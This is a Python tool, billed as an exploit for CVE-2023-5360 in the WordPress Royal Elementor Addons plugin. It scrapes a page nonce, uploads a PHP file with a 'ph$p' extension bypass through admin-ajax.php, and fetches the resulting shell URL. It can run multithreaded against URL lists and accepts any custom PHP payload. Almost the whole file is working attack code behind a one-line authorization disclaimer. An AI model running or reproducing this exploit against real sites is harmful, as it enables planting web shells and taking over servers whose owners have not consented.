"""Scanner for CVE-2023-5360 in the WordPress "Royal Elementor Addons" plugin.

Only run this against systems you own or are explicitly authorized to test.
"""

import re
import json
import random
import string
import argparse
import requests

from rich.console import Console
from alive_progress import alive_bar
from concurrent.futures import ThreadPoolExecutor, as_completed


class WPVulnScanner:
    """Check WordPress sites for the Royal Elementor Addons upload flaw.

    One instance holds a shared ``requests.Session`` plus the CLI options
    (verbosity, optional custom upload file, optional output file, request
    timeout and worker-thread count).
    """

    # Rich colour used for each message header symbol.
    HEADER_COLORS = {
        "+": "green",
        "-": "red",
        "!": "yellow",
        "*": "blue",
    }

    # Inline ``var WprConfig = {...};`` object emitted in the page source.
    # Raw string: ``\s`` in a plain string literal is an invalid escape.
    _NONCE_PATTERN = re.compile(r"var\s+WprConfig\s*=\s*({.*?});")

    def __init__(self, verbose=False, custom_file=None, output_file=None, timeout=10, threads=200):
        """Store the options and prepare the HTTP session and console.

        Args:
            verbose: When true, messages flagged ``verbose_required`` are shown.
            custom_file: Optional path of a file whose bytes are uploaded.
            output_file: Optional path that positive results are appended to.
            timeout: Per-request timeout in seconds.
            threads: Worker count used when scanning a list of URLs.
        """
        self.session = requests.Session()
        self.headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
            "PoC": "https://github.com/Chocapikk/CVE-2023-5360"
        }
        self.verbose = verbose
        self.custom_file = custom_file
        self.output_file = output_file
        self.timeout = timeout
        self.threads = threads
        self.console = Console()

        # Every request is sent with verify=False; silence the resulting
        # urllib3 warning once instead of once per request.
        request_package = requests.packages.urllib3
        request_package.disable_warnings(request_package.exceptions.InsecureRequestWarning)

    def custom_print(self, message, header, verbose_required=False):
        """Print ``message`` prefixed with a coloured ``[header]`` tag.

        Args:
            message: Text to print.
            header: One of ``+``, ``-``, ``!``, ``*``; selects the colour.
            verbose_required: When true, print only if verbose mode is on.

        Raises:
            KeyError: If ``header`` is not a known symbol and the message
                would be printed.
        """
        if verbose_required and not self.verbose:
            return
        color = self.HEADER_COLORS[header]
        self.console.print(f"[bold {color}][{header}][/bold {color}] {message}")

    def _write_output(self, url):
        """Append ``url`` as one line to the output file, if one is configured."""
        if self.output_file:
            with open(self.output_file, 'a') as file:
                file.write(url + '\n')

    def _get_nonce(self, url):
        """Fetch ``url`` and return the ``nonce`` from its ``WprConfig`` object.

        Returns:
            The nonce value, or ``None`` when the request failed, the page has
            no ``WprConfig`` assignment, or the object has no ``nonce`` key.

        Raises:
            json.JSONDecodeError: If the matched object is not valid JSON.
        """
        response, _ = self._make_request(url)
        if response is None:
            # The request failed and was already reported by _make_request.
            return None
        match = self._NONCE_PATTERN.search(response.text)
        if match:
            nonce_json = json.loads(match.group(1))
            return nonce_json.get("nonce")
        return None

    def _make_request(self, url, nonce=None):
        """Send a GET to ``url``, or the upload POST when ``nonce`` is given.

        Args:
            url: Target URL.
            nonce: When truthy, a multipart POST is sent with this value as
                ``wpr_addons_nonce``; otherwise a plain GET is sent.

        Returns:
            ``(response, marker)``. ``marker`` is the random 10-character
            string generated for a POST and ``None`` for a GET. On a
            ``requests`` error the error is reported (verbose only) and
            ``(None, None)`` is returned.

        Raises:
            OSError: If the custom upload file cannot be read.
        """
        # Bind before the try block so the finally clause can always test it,
        # even when the request (or reading the custom file) raises.
        response = None
        try:
            new_nonce = None
            if nonce:
                new_nonce = ''.join(random.choices(string.ascii_letters + string.digits, k=10))
                # NOTE(review): the marker above is not embedded in the content
                # as written here, so the caller's marker check only matches
                # if the server happens to return it -- confirm the intent.
                random_content = ''
                file_content = random_content.encode('utf-8')
                if self.custom_file:
                    with open(self.custom_file, 'rb') as f:
                        file_content += f.read()
                    self.custom_print(f"Sending request with payload from file: {self.custom_file}", "*", verbose_required=True)
                else:
                    self.custom_print(f"Sending request with payload: {random_content}", "*", verbose_required=True)

                files = {
                    "uploaded_file": ("poc.ph$p", file_content)
                }
                data = {
                    "action": "wpr_addons_upload_file",
                    "max_file_size": 0,
                    "allowed_file_types": "ph$p",
                    "triggering_event": "click",
                    "wpr_addons_nonce": nonce
                }
                response = self.session.post(url, headers=self.headers, files=files, data=data, verify=False, timeout=self.timeout)
            else:
                response = self.session.get(url, headers=self.headers, verify=False, timeout=self.timeout)
            return response, new_nonce
        except requests.exceptions.RequestException as e:
            self.custom_print(f"Request error for {url}: {e}", "-", verbose_required=True)
        finally:
            # Compare with None explicitly: a Response is falsy for 4xx/5xx
            # status codes, and those should be closed too. The body has
            # already been read (no stream=True), so callers can still use
            # response.text afterwards.
            if response is not None:
                response.close()
        return None, None

    def plugin_exists(self, url):
        """Return True if the plugin's ``readme.txt`` is served under ``url``.

        The readme must answer with status 200 and contain the plugin slug.
        """
        readme_url = f"{url}/wp-content/plugins/royal-elementor-addons/readme.txt"
        response, _ = self._make_request(readme_url)
        if response is not None and response.status_code == 200:
            return "royal-elementor-addons" in response.text
        return False

    def check_vulnerability(self, url):
        """Run the full check against one site.

        Steps: confirm the plugin is present, read the nonce from the page,
        send the upload request, then fetch the URL returned by the server
        and look for the random marker in it.

        Returns:
            ``(message, "+")`` when the marker is found, otherwise ``None``.
            Never raises: any error is reported (verbose only) and turned
            into ``None`` so a single bad target cannot stop a list scan.
        """
        try:
            if not self.plugin_exists(url):
                self.custom_print(f"Plugin 'royal-elementor-addons' not found at {url}. Skipping...", "-", verbose_required=True)
                return None

            self.custom_print(f"Scanning {url}", "*", verbose_required=True)
            nonce = self._get_nonce(url)
            if not nonce:
                self.custom_print(f"No nonce found for {url}", "-", verbose_required=True)
                return None
            self.custom_print(f"Nonce found: {nonce}", "!", verbose_required=True)

            ajax_url = f"{url}/wp-admin/admin-ajax.php"
            response, new_nonce = self._make_request(ajax_url, nonce)
            if response is None:
                self.custom_print(f"No response received for {url}", "-", verbose_required=True)
                return None
            self.custom_print(f"Sent request to {ajax_url} with nonce: {nonce}", "*", verbose_required=True)

            try:
                json_response = json.loads(response.text)
            except json.JSONDecodeError:
                self.custom_print(f"Unexpected server response for {url}. Not vulnerable.", "-", verbose_required=True)
                return None

            # The body may be valid JSON without being an object (for example
            # a bare number or a list); treat that like an unsuccessful reply.
            if isinstance(json_response, dict) and json_response.get("success"):
                shell_url = json_response["data"]["url"]
                shell_response, _ = self._make_request(shell_url)
                if (
                    shell_response is not None
                    and shell_response.status_code == 200
                    and new_nonce.strip() in shell_response.text.strip()
                ):
                    self._write_output(shell_url)
                    return (f"CVE-2023-5360 detected for {shell_url}", "+")
            else:
                self.custom_print(f"Failed to upload shell for {url}", "-", verbose_required=True)
        except Exception as e:
            # Deliberate catch-all at the per-target boundary.
            self.custom_print(f"Error during vulnerability check for {url}: {e}", "-", verbose_required=True)
        return None


def initialize_options():
    """Parse and return the command-line arguments.

    Exactly one of ``-u/--url`` and ``-l/--list`` is required.
    """
    parser = argparse.ArgumentParser(description="WordPress Royal Elementor Addons and Templates Exploit (CVE-2023-5360)")
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument("-u", "--url", help="Scan a single URL")
    group.add_argument("-l", "--list", help="Scan a list of URLs from a file")
    parser.add_argument("-v", "--verbose", help="Verbose mode (only with -u/--url)", action="store_true")
    parser.add_argument("-o", "--output", help="Output file to save vulnerable URLs")
    parser.add_argument("-f", "--file", help="Custom PHP file to upload", default=None)
    parser.add_argument("-t", "--threads", help="Number of threads to use", default=200, type=int)
    parser.add_argument("-T", "--timeout", help="Request timeout in seconds", default=10, type=int)
    return parser.parse_args()


def _unique_by_domain(raw_urls):
    """Return the first URL seen for each host, skipping blank entries.

    The host is the part between an optional ``scheme://`` and the first
    ``/``; a leading ``www.`` is ignored when comparing hosts.
    """
    unique_urls = {}
    for raw in raw_urls:
        url = raw.strip()
        if not url:
            # Blank lines would otherwise be scanned as an empty target.
            continue
        domain = url.split("//")[-1].split("/")[0]
        if domain.startswith("www."):
            # Strip only the prefix; a plain replace() would also mangle
            # hosts that merely contain "www." somewhere inside.
            domain = domain[len("www."):]
        unique_urls.setdefault(domain, url)
    return list(unique_urls.values())


def main():
    """Entry point: scan one URL, or a de-duplicated list using a thread pool."""
    args = initialize_options()
    # Forward --timeout and --threads as well; without this the scanner
    # always runs with its constructor defaults.
    scanner = WPVulnScanner(
        verbose=args.verbose,
        custom_file=args.file,
        output_file=args.output,
        timeout=args.timeout,
        threads=args.threads,
    )

    if args.url:
        result = scanner.check_vulnerability(args.url)
        if result:
            scanner.custom_print(result[0], result[1])
    elif args.list:
        with open(args.list, 'r') as file:
            urls = _unique_by_domain(file)

        with ThreadPoolExecutor(max_workers=scanner.threads) as executor, alive_bar(len(urls), bar='smooth', enrich_print=False) as bar:
            futures = {executor.submit(scanner.check_vulnerability, url): url for url in urls}
            for future in as_completed(futures):
                result = future.result()
                if result:
                    scanner.custom_print(result[0], result[1])
                bar()


if __name__ == "__main__":
    main()